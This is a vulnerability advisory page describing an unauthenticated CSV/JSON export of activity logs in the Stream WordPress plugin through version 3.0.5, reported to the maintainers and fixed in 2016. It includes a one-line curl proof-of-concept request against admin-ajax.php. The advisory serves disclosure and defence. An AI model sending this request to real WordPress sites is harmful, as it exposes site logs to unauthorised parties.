Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbJames GolovichWPVDB-ID:8FA150BE-75C2-48B3-8D3B-BC623F25DEBD
HistoryMay 31, 2016 - 12:00 a.m.

Stream <= 3.0.5 - Unauthenticated Events Export

2016-05-3100:00:00
James Golovich
wpscan.com
5
JSON

The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version released 5/30/2016

PoC

curl -i -X POST -H “Content-Type:application/x-www-form-urlencoded” -d “action=nonexistingaction” ‘http://example.com/wordpress/wp-admin/admin-ajax.php?page=wp_stream&amp;record-actions;=export-json

JSON